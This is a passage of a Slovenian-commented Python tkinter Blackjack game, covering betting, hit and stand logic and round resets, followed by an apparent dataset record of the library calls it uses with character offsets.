if self.vrednost == 11 and self.scoreDealer > 10:
self.vrednost = 1
self.scoreDealer += self.vrednost
self.drugaKartaDealer = tkinter.PhotoImage(file = self.drugaKartaDealer) #Playing with fire
self.drugaKartaDealerNaPlatnu = self.platno.create_image(160, 120, image = self.drugaKartaDealer)
#Po pravilih je druga karta dealerja zakrita
self.zakritaKarta = tkinter.PhotoImage(file = 'karte/back.gif')
self.zakritaKartaNaPlatnu = self.platno.create_image(160, 120, image = self.zakritaKarta)
##
#Na platno postavimo navodila, kaj naj igralec stori
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.placeBet)
def vrednostKarte(self, karta):
if karta == 'karte/1.gif' or karta == 'karte/2.gif' or karta == 'karte/3.gif' or karta == 'karte/4.gif':
return 11
if karta == 'karte/5.gif' or karta == 'karte/6.gif' or karta == 'karte/7.gif' or karta == 'karte/8.gif' or karta == 'karte/9.gif' or karta == 'karte/10.gif' or karta == 'karte/11.gif' or karta == 'karte/12.gif' or karta == 'karte/13.gif' or karta == 'karte/14.gif' or karta == 'karte/15.gif' or karta == 'karte/16.gif' or karta == 'karte/17.gif' or karta == 'karte/18.gif' or karta == 'karte/19.gif' or karta == 'karte/20.gif':
return 10
if karta == 'karte/21.gif' or karta == 'karte/22.gif' or karta == 'karte/23.gif' or karta == 'karte/24.gif':
return 9
if karta == 'karte/25.gif' or karta == 'karte/26.gif' or karta == 'karte/27.gif' or karta == 'karte/28.gif':
return 8
if karta == 'karte/29.gif' or karta == 'karte/30.gif' or karta == 'karte/31.gif' or karta == 'karte/32.gif':
return 7
if karta == 'karte/33.gif' or karta == 'karte/34.gif' or karta == 'karte/35.gif' or karta == 'karte/36.gif':
return 6
if karta == 'karte/37.gif' or karta == 'karte/38.gif' or karta == 'karte/39.gif' or karta == 'karte/40.gif':
return 5
if karta == 'karte/41.gif' or karta == 'karte/42.gif' or karta == 'karte/43.gif' or karta == 'karte/44.gif':
return 4
if karta == 'karte/45.gif' or karta == 'karte/46.gif' or karta == 'karte/47.gif' or karta == 'karte/48.gif':
return 3
if karta == 'karte/49.gif' or karta == 'karte/50.gif' or karta == 'karte/51.gif' or karta == 'karte/52.gif':
return 2
def dodaj10(self):
if self.credit >= 10:
self.gumbHit.config(state = 'normal')
self.gumbStand.config(state = 'normal')
#stava se poveca
self.vsotaStave += 10
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
#credit se zmanjsa
self.credit -= 10
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
else:
pass
def dodaj20(self):
if self.credit >= 20 :
self.gumbHit.config(state = 'normal')
self.gumbStand.config(state = 'normal')
#stava se poveca
self.vsotaStave += 20
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
#credit se zmanjsa
self.credit -= 20
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
else:
pass
def dodaj50(self):
if self.credit >= 50:
self.gumbHit.config(state = 'normal')
self.gumbStand.config(state = 'normal')
#stava se poveca
self.vsotaStave += 50
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
#credit se zmanjsa
self.credit -= 50
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
else:
pass
def hit(self):
self.gumbStand.config(state = 'normal')
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
if self.indexIgralceveKarte >= 3: #Ne moremo imeti vec kot 5 kart
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.maxReached)
self.gumbHit.config(state = 'disabled')
else:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.hitORstand)
#iz premesanega kupa izberemo karto
self.sezKartIgralec[self.indexIgralceveKarte] = self.sezKart.pop()
#dolocimo vrednost izbrane karte
self.vrednost = self.vrednostKarte(self.sezKartIgralec[self.indexIgralceveKarte])
#ce smo dobili asa, ki je vreden 11 vendar bi nam bolj pasala 1 si stejemo 1
if self.vrednost == 11 and self.scorePlayer > 10:
self.vrednost = 1
#povecamo skupno vsoto
self.scorePlayer += self.vrednost
#karto nalozimo, da bi jo lahko prikazali
self.sezKartIgralec[self.indexIgralceveKarte] = tkinter.PhotoImage(file = self.sezKartIgralec[self.indexIgralceveKarte])
#karto prikazemo na zaslonu
self.sezKartIgralecPlatno[self.indexIgralceveKarte] = self.platno.create_image(self.pX, self.pY, image = self.sezKartIgralec[self.indexIgralceveKarte])
if self.scorePlayer == 21:
#Sporocimo igralcu kaj se je zgodilo
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.pBlackjack)
#zmagali smo torej si zasluzimo denar
self.credit += (self.vsotaStave*2)
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
if self.scorePlayer > 21:
#igralcu sporocimo, kaj se je zgodilo
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.pBust)
#izgubili smo, torej smo izgubili trenutno stavo
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
self.indexIgralceveKarte += 1 #s tem naredimo prostor za naslednjo karto
self.pX += 100 #premaknemo pozicijo, da bi lahko prikazali novo karto
def stand(self):
#self.gumbStand.config(state = 'disabled')
#self.gumbHit.config(state = 'normal')
self.platno.delete(self.zakritaKartaNaPlatnu)
while self.scoreDealer < 15:
#iz premesanega kupa izberemo karto
self.sezKartDealer[self.indexDealerjeveKarte] = self.sezKart.pop()
#dolocimo vrednost izbrane karte
self.vrednost = self.vrednostKarte(self.sezKartDealer[self.indexDealerjeveKarte])
#spremenimo vrednost asa iz 11 v ena ce nam bolj pase
if self.vrednost == 11 and self.scoreDealer > 10:
self.vrednost = 1
self.scoreDealer += self.vrednost
#karto nalozimo, da bi jo lahko prikazali
self.sezKartDealer[self.indexDealerjeveKarte] = tkinter.PhotoImage(file = self.sezKartDealer[self.indexDealerjeveKarte])
#karto prikazemo na zaslonu
self.sezKartDealerPlatno[self.indexDealerjeveKarte] = self.platno.create_image(self.dX, self.dY, image = self.sezKartDealer[self.indexDealerjeveKarte])
self.indexDealerjeveKarte += 1 #s tem naredimo prostor za naslednjo karto
self.dX += 100 #premaknemo pozicijo, da bi lahko prikazali novo karto
if self.scoreDealer > 21:
#Sporocimo igralcu kaj se je zgodilo
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.dBust)
#zmagali smo torej si zasluzimo denar
self.credit += (self.vsotaStave*2)
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
elif self.scoreDealer == 21:
#igralcu sporocimo, kaj se je zgodilo
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.dBlackjack)
#izgubili smo, torej smo izgubili trenutno stavo
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
self.oceniIgro()
def oceniIgro(self):
'''Metoda namenjena oceni igre, če noben ne preseže 21 oz. ga ne pogodi blackjack'''
if self.scorePlayer > self.scoreDealer:
#Zmaga igralec
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.pWin)
self.credit += (self.vsotaStave*2)
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
elif self.scorePlayer == self.scoreDealer:
#Neodloceno
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.draw)
self.credit += int(math.ceil(0.5 * self.vsotaStave))
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
elif self.scoreDealer > self.scorePlayer and self.scoreDealer <= 21:
#Zmaga dealer
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(310, 230, window = self.dWin)
self.vsotaStave = 0
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.gumbNaprejNaPlatnu = self.platno.create_window(610, 400, window = self.gumbNaprej)
if self.credit == 0:
self.platno.delete(self.navodilaPlatno)
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.emptyBank)
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.platno.delete(self.gumbNaprejNaPlatnu)
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'disabled')
self.gumb20.config(state = 'disabled')
self.gumb50.config(state = 'disabled')
def naslednjaRoka(self):
'''Metoda se izvede ob zakljucku vsake igre. Njen glavni namen je pobrisati stvari, ki so ostale
iz prejsnje igre iz platna, ter ponovno nastaviti nekatere spremenljivke. Npr. seznam kart mora, biti
zopet poln, pa se premesati ga moremo. Poleg tega moramo se ponastaviti tocke igralca in
dealerja na 0.'''
##Najprej pobrisemo vse kar bomo hoteli imeti na platnu na novo
self.platno.delete(self.navodilaPlatno) #To moramo najprej, drugace bodo prekrivanja
#pobrisemo dve karte ob inicializaciji
self.platno.delete(self.prvaKartaPlayer)
self.platno.delete(self.prvaKartaDealer)
self.platno.delete(self.drugaKartaPlayer)
self.platno.delete(self.drugaKartaDealer)
#Ponovno nastavimo tudi tri karte, ki jih dobimo kasneje
for i in range(0, 3):
self.sezKartIgralec[i] = ''
self.sezKartDealer[i] = ''
self.sezKartIgralecPlatno[i] = ''
self.sezKartDealerPlatno[i] = ''
##
##<NAME>
self.sezKart = ['karte/1.gif', 'karte/2.gif', 'karte/3.gif', 'karte/4.gif', 'karte/5.gif',
'karte/6.gif', 'karte/7.gif', 'karte/8.gif', 'karte/9.gif', 'karte/10.gif',
'karte/11.gif', 'karte/12.gif', 'karte/13.gif', 'karte/4.gif', 'karte/15.gif',
'karte/16.gif', 'karte/17.gif', 'karte/18.gif', 'karte/19.gif', 'karte/20.gif',
'karte/21.gif', 'karte/22.gif', 'karte/23.gif', 'karte/24.gif', 'karte/25.gif',
'karte/26.gif', 'karte/27.gif', 'karte/28.gif', 'karte/29.gif', 'karte/30.gif',
'karte/31.gif', 'karte/32.gif', 'karte/33.gif', 'karte/34.gif', 'karte/35.gif',
'karte/36.gif', 'karte/37.gif', 'karte/38.gif', 'karte/39.gif', 'karte/40.gif',
'karte/41.gif', 'karte/42.gif', 'karte/43.gif', 'karte/44.gif', 'karte/45.gif',
'karte/46.gif', 'karte/47.gif', 'karte/48.gif', 'karte/49.gif', 'karte/50.gif',
'karte/51.gif', 'karte/52.gif']
self.scorePlayer = 0
self.scoreDealer = 0
self.pX = 260
self.dX = 260
self.indexIgralceveKarte = 0
self.indexDealerjeveKarte = 0
##
##Ponovno inicializiramo igro
random.shuffle(self.sezKart)#premesamo kup kart
##Najprej inicializiramo igralca
self.prvaKartaPlayer = self.sezKart.pop() #izberemo prvo karto igralcu
self.scorePlayer += self.vrednostKarte(self.prvaKartaPlayer) # dolocimo vrednost prve karte
self.prvaKartaPlayer = tkinter.PhotoImage(file = self.prvaKartaPlayer) #Playing with fire
self.prvaKartaPlayerNaPlatnu = self.platno.create_image(60, 350, image = self.prvaKartaPlayer)
self.drugaKartaPlayer = self.sezKart.pop() #izberemo drugo karto igralcu
self.scorePlayer += self.vrednostKarte(self.drugaKartaPlayer) # dolocimo vrednost druge karte
self.drugaKartaPlayer = tkinter.PhotoImage(file = self.drugaKartaPlayer) #Playing with fire
self.drugaKartaPlayerNaPlatnu = self.platno.create_image(160, 350, image = self.drugaKartaPlayer)
##
##Potem inicializiramo dealerja
self.prvaKartaDealer = self.sezKart.pop() #izberemo prvo karto dealerju
self.scoreDealer += self.vrednostKarte(self.prvaKartaDealer) # dolocimo vrednost prve karte
self.prvaKartaDealer = tkinter.PhotoImage(file = self.prvaKartaDealer) #Playing with fire
self.prvaKartaDealerNaPlatnu = self.platno.create_image(60, 120, image = self.prvaKartaDealer)
self.drugaKartaDealer = self.sezKart.pop() #izberemo drugo karto dealerju
self.scoreDealer += self.vrednostKarte(self.drugaKartaDealer) # dolocimo vrednost druge karte
self.drugaKartaDealer = tkinter.PhotoImage(file = self.drugaKartaDealer) #Playing with fire
self.drugaKartaDealerNaPlatnu = self.platno.create_image(160, 120, image = self.drugaKartaDealer)
#Po pravilih je druga karta dealerja zakrita
self.zakritaKarta = tkinter.PhotoImage(file = 'karte/back.gif')
self.zakritaKartaNaPlatnu = self.platno.create_image(160, 120, image = self.zakritaKarta)
##
#Na platno postavimo navodila, kaj naj igralec stori
self.navodilaPlatno = self.platno.create_window(270, 230, window = self.placeBet)
#Ponastavimo se gumbe
self.gumbHit.config(state = 'disabled')
self.gumbStand.config(state = 'disabled')
self.gumb10.config(state = 'normal')
self.gumb20.config(state = 'normal')
self.gumb50.config(state = 'normal')
self.platno.delete(self.gumbNaprejNaPlatnu)
def newGame(self):
'''Metoda se uporablja, ko igralec ostane brez denarja. Lahko pa se kliče
za svež začetek'''
self.credit = 1000
self.platno.delete(self.creditNapisPlatno)
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
self.vsotaStave = 0
self.platno.delete(self.vsotaStaveNapisPlatno)
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 285, window = self.vsotaStaveNapis)
self.naslednjaRoka()
if __name__ == '__main__':
root = tkinter.Tk()
root.title('Blackjack')
app = Blackjack(root)
root.mainloop()
| [
"tkinter.Menu",
"math.ceil",
"random.shuffle",
"tkinter.Button",
"tkinter.Canvas",
"tkinter.Tk",
"tkinter.Label",
"tkinter.PhotoImage"
] | [((31798, 31810), 'tkinter.Tk', 'tkinter.Tk', ([], {}), '()\n', (31808, 31810), False, 'import tkinter\n'), ((115, 135), 'tkinter.Menu', 'tkinter.Menu', (['master'], {}), '(master)\n', (127, 135), False, 'import tkinter\n'), ((185, 209), 'tkinter.Menu', 'tkinter.Menu', (['glavniMenu'], {}), '(glavniMenu)\n', (197, 209), False, 'import tkinter\n'), ((452, 509), 'tkinter.Canvas', 'tkinter.Canvas', (['master'], {'width': '(700)', 'height': '(480)', 'bg': '"""green"""'}), "(master, width=700, height=480, bg='green')\n", (466, 509), False, 'import tkinter\n'), ((2567, 2655), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player:"""', 'bg': '"""green"""', 'fg': '"""blue"""', 'font': "('Helvetica', 18, 'bold')"}), "(text='Player:', bg='green', fg='blue', font=('Helvetica', 18,\n 'bold'))\n", (2580, 2655), False, 'import tkinter\n'), ((2816, 2903), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Dealer:"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 18, 'bold')"}), "(text='Dealer:', bg='green', fg='red', font=('Helvetica', 18,\n 'bold'))\n", (2829, 2903), False, 'import tkinter\n'), ((3086, 3159), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Credit:"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Credit:', bg='green', font=('Helvetica', 23, 'bold'))\n", (3099, 3159), False, 'import tkinter\n'), ((3348, 3426), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Current Bet:"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Current Bet:', bg='green', font=('Helvetica', 23, 'bold'))\n", (3361, 3426), False, 'import tkinter\n'), ((4133, 4211), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player Wins!"""', 'bg': '"""green"""', 'font': "('Helvetica', 24, 'bold')"}), "(text='Player Wins!', bg='green', font=('Helvetica', 24, 'bold'))\n", (4146, 4211), False, 'import tkinter\n'), ((4238, 4331), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Blackjack! Player Wins!"""', 'bg': '"""green"""', 'font': "('Helvetica', 21, 'bold')"}), "(text='Blackjack! Player Wins!', bg='green', font=('Helvetica',\n 21, 'bold'))\n", (4251, 4331), False, 'import tkinter\n'), ((4349, 4442), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player Busts!"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 21, 'bold')"}), "(text='Player Busts!', bg='green', fg='red', font=('Helvetica',\n 21, 'bold'))\n", (4362, 4442), False, 'import tkinter\n'), ((4464, 4556), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Delaer Wins!"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Delaer Wins!', bg='green', fg='red', font=('Helvetica',\n 23, 'bold'))\n", (4477, 4556), False, 'import tkinter\n'), ((4581, 4684), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Dealer hits Blackjack! You Lose!"""', 'bg': '"""green"""', 'font': "('Helvetica', 25, 'bold')"}), "(text='Dealer hits Blackjack! You Lose!', bg='green', font=(\n 'Helvetica', 25, 'bold'))\n", (4594, 4684), False, 'import tkinter\n'), ((4701, 4798), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Dealer Busts! Player Wins!"""', 'bg': '"""green"""', 'font': "('Helvetica', 25, 'bold')"}), "(text='Dealer Busts! Player Wins!', bg='green', font=(\n 'Helvetica', 25, 'bold'))\n", (4714, 4798), False, 'import tkinter\n'), ((4814, 4893), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""It is a Draw!"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='It is a Draw!', bg='green', font=('Helvetica', 23, 'bold'))\n", (4827, 4893), False, 'import tkinter\n'), ((4923, 5001), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Hit or Stand"""', 'bg': '"""green"""', 'font': "('Helvetica', 23, 'bold')"}), "(text='Hit or Stand', bg='green', font=('Helvetica', 23, 'bold'))\n", (4936, 5001), False, 'import tkinter\n'), ((5028, 5135), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Maximum of 5 cards reached!"""', 'bg': '"""green"""', 'fg': '"""red"""', 'font': "('Helvetica', 15, 'bold')"}), "(text='Maximum of 5 cards reached!', bg='green', fg='red',\n font=('Helvetica', 15, 'bold'))\n", (5041, 5135), False, 'import tkinter\n'), ((5158, 5277), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Place your bet and decide wether to Hit or Stand"""', 'bg': '"""green"""', 'font': "('Helvetica', 11, 'bold')"}), "(text='Place your bet and decide wether to Hit or Stand', bg=\n 'green', font=('Helvetica', 11, 'bold'))\n", (5171, 5277), False, 'import tkinter\n'), ((5298, 5416), 'tkinter.Label', 'tkinter.Label', ([], {'text': '"""Player ran out of money. Please choose new game."""', 'bg': '"""green"""', 'font': "('Helvetica', 8, 'bold')"}), "(text='Player ran out of money. Please choose new game.', bg=\n 'green', font=('Helvetica', 8, 'bold'))\n", (5311, 5416), False, 'import tkinter\n'), ((5459, 5529), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""HIT"""', 'command': 'self.hit', 'state': '"""disabled"""'}), "(master, text='HIT', command=self.hit, state='disabled')\n", (5473, 5529), False, 'import tkinter\n'), ((5644, 5718), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""STAND"""', 'command': 'self.stand', 'state': '"""disabled"""'}), "(master, text='STAND', command=self.stand, state='disabled')\n", (5658, 5718), False, 'import tkinter\n'), ((5835, 5904), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""Next Round"""', 'command': 'self.naslednjaRoka'}), "(master, text='Next Round', command=self.naslednjaRoka)\n", (5849, 5904), False, 'import tkinter\n'), ((5983, 6039), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""$10"""', 'command': 'self.dodaj10'}), "(master, text='$10', command=self.dodaj10)\n", (5997, 6039), False, 'import tkinter\n'), ((6145, 6201), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""$20"""', 'command': 'self.dodaj20'}), "(master, text='$20', command=self.dodaj20)\n", (6159, 6201), False, 'import tkinter\n'), ((6307, 6363), 'tkinter.Button', 'tkinter.Button', (['master'], {'text': '"""$50"""', 'command': 'self.dodaj50'}), "(master, text='$50', command=self.dodaj50)\n", (6321, 6363), False, 'import tkinter\n'), ((7351, 7379), 'random.shuffle', 'random.shuffle', (['self.sezKart'], {}), '(self.sezKart)\n', (7365, 7379), False, 'import random\n'), ((7661, 7706), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaPlayer'}), '(file=self.prvaKartaPlayer)\n', (7679, 7706), False, 'import tkinter\n'), ((8196, 8242), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaPlayer'}), '(file=self.drugaKartaPlayer)\n', (8214, 8242), False, 'import tkinter\n'), ((8631, 8676), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaDealer'}), '(file=self.prvaKartaDealer)\n', (8649, 8676), False, 'import tkinter\n'), ((9168, 9214), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaDealer'}), '(file=self.drugaKartaDealer)\n', (9186, 9214), False, 'import tkinter\n'), ((9408, 9449), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': '"""karte/back.gif"""'}), "(file='karte/back.gif')\n", (9426, 9449), False, 'import tkinter\n'), ((28835, 28863), 'random.shuffle', 'random.shuffle', (['self.sezKart'], {}), '(self.sezKart)\n', (28849, 28863), False, 'import random\n'), ((29113, 29158), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.prvaKartaPlayer'}), '(file=self.prvaKartaPlayer)\n', (29131, 29158), False, 'import tkinter\n'), ((29477, 29523), 'tkinter.PhotoImage', 'tkinter.PhotoImage', ([], {'file': 'self.drugaKartaPlayer'}), '(file=self.drugaKartaPlayer)\n', (29495, 29523), False, 'import tkinter\n'), ((29880, 29925), 'tkinter.PhotoImage', 